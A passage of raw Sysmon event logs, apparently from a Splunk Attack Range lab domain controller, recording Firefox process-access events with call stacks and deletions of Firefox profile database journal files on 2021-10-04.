Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8A15ABB86EC8C4A1ABE51F01E64ED87,SHA256=6189DF404A55531BF46BDB5B24CBF65ADFC32DA10A018271177E8BE63DB01A20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105308Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.696{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-journalMD5=8A083D4D71354ADFA5A0F8A9B0D8865A,SHA256=E970BB6F3D1F7AC99AF63CF552537903FDEEAC48B99E79D654CC6301F6191B83,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105307Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.696{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+bf7923|C:\Program Files\Mozilla Firefox\xul.dll+bf6fc1|C:\Program Files\Mozilla Firefox\xul.dll+beec83|C:\Program Files\Mozilla Firefox\xul.dll+bf8370|C:\Program Files\Mozilla Firefox\xul.dll+feccf0|C:\Program Files\Mozilla Firefox\xul.dll+fddacb|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+fe1f1e|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+fe17ac|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+fe1f1e|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04 23542300x8000000000000000105306Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.649{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-journalMD5=5E037A644B4C0BF88CFA15DC29941CA8,SHA256=3204E3E4AFDC39DB08B757039D3C3BA889F6D447994C42A9F90417AD48B85546,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105305Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.633{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105304Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.579{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|UNKNOWN(0000037E879B466F) 10341000x8000000000000000105303Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.579{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|UNKNOWN(0000037E879B466F) 10341000x8000000000000000105302Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.579{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|UNKNOWN(0000037E879B466F) 10341000x8000000000000000105301Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.495{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2f710|C:\Program Files\Mozilla Firefox\xul.dll+e5ba99|C:\Program Files\Mozilla Firefox\xul.dll+e57449|C:\Program Files\Mozilla Firefox\xul.dll+e468b7|C:\Program Files\Mozilla Firefox\xul.dll+e48234|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+274461|C:\Program Files\Mozilla Firefox\xul.dll+38136e|C:\Program Files\Mozilla Firefox\xul.dll+cfeed6|C:\Program Files\Mozilla Firefox\xul.dll+176953f|C:\Program Files\Mozilla Firefox\xul.dll+16fdc02|C:\Program Files\Mozilla Firefox\xul.dll+16d21c4|C:\Program Files\Mozilla Firefox\xul.dll+1b6175d|C:\Program Files\Mozilla Firefox\xul.dll+16fe0ad 23542300x8000000000000000105300Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.379{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B843CC5A79067B8320B630BD0B66CF06,SHA256=EFEA11D80E73D2EE4A914DA609398DD76486692C217F32E71E53B2E74BFAC56B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105299Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.363{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|UNKNOWN(0000037E879B466F) 10341000x8000000000000000105298Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.363{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|UNKNOWN(0000037E879B466F) 10341000x8000000000000000105297Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.363{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|UNKNOWN(0000037E879B466F) 23542300x8000000000000000105296Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.347{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105295Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.332{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167c38c|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105294Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.332{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167c38c|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105293Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.332{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167c38c|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000105292Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.332{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105291Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.332{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\content-prefs.sqlite-journalMD5=58F50476DF7524305A564B497F6231EE,SHA256=32F58BC9EF685FEF15CC294AB491E2B198BD5DC07E35A76B4083845449EC3A82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105290Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.309{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-walMD5=2E3B9EDCD433E04A1C54756B0A2204C3,SHA256=4BE1590349A61FF18ABB71B0FC775566C2C15DD551C1034E56A2DC3660E67E7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105289Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.309{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=847341469F010253273156CFE9566C3C,SHA256=310A7553294AC941AF39DBC73088B180F06E37865C4801946FDA312BC281976D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105288Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.309{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\default\moz-extension+++bf046f72-173e-4f01-a118-3e568a0f3047^userContextId=4294967295\idb\3647222921wleabcEoxlt-eengsairo.sqlite-walMD5=9FC5279F487664D3C91FC76D620C969A,SHA256=206CD27D0A2404E6836DE6547108A25312CCB8347A2FD082DC27AFF06E517DA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105287Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.309{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\default\moz-extension+++bf046f72-173e-4f01-a118-3e568a0f3047^userContextId=4294967295\idb\3647222921wleabcEoxlt-eengsairo.sqlite-shmMD5=896E1CD00ECB644701F5610D476CB016,SHA256=18609E4BA728864EB17375EA00D8ED512FEE7A3CDA58E3243429D3FE0F46A2BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105286Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.309{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105285Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.263{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105284Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.263{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105283Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.249{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105282Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.249{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105281Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.249{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105280Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.249{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105279Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.249{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105278Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.209{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a16469|C:\Program Files\Mozilla Firefox\xul.dll+a1638a|C:\Program Files\Mozilla Firefox\xul.dll+a15f79|C:\Program Files\Mozilla Firefox\xul.dll+a120ff|C:\Program Files\Mozilla Firefox\xul.dll+a1240c|C:\Program Files\Mozilla Firefox\xul.dll+b5f98a|C:\Program Files\Mozilla Firefox\xul.dll+2dbf19|C:\Program Files\Mozilla Firefox\xul.dll+2dbe24|C:\Program Files\Mozilla Firefox\xul.dll+2dbc0d|C:\Program Files\Mozilla Firefox\xul.dll+2dbaa4|C:\Program Files\Mozilla Firefox\xul.dll+bab3e3|C:\Program Files\Mozilla Firefox\xul.dll+bac0d1|C:\Program Files\Mozilla Firefox\xul.dll+bab0dd|C:\Program Files\Mozilla Firefox\xul.dll+bab032|C:\Program Files\Mozilla Firefox\xul.dll+b7c131|C:\Program Files\Mozilla Firefox\xul.dll+1a25c2a|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a 10341000x8000000000000000105277Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.183{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla 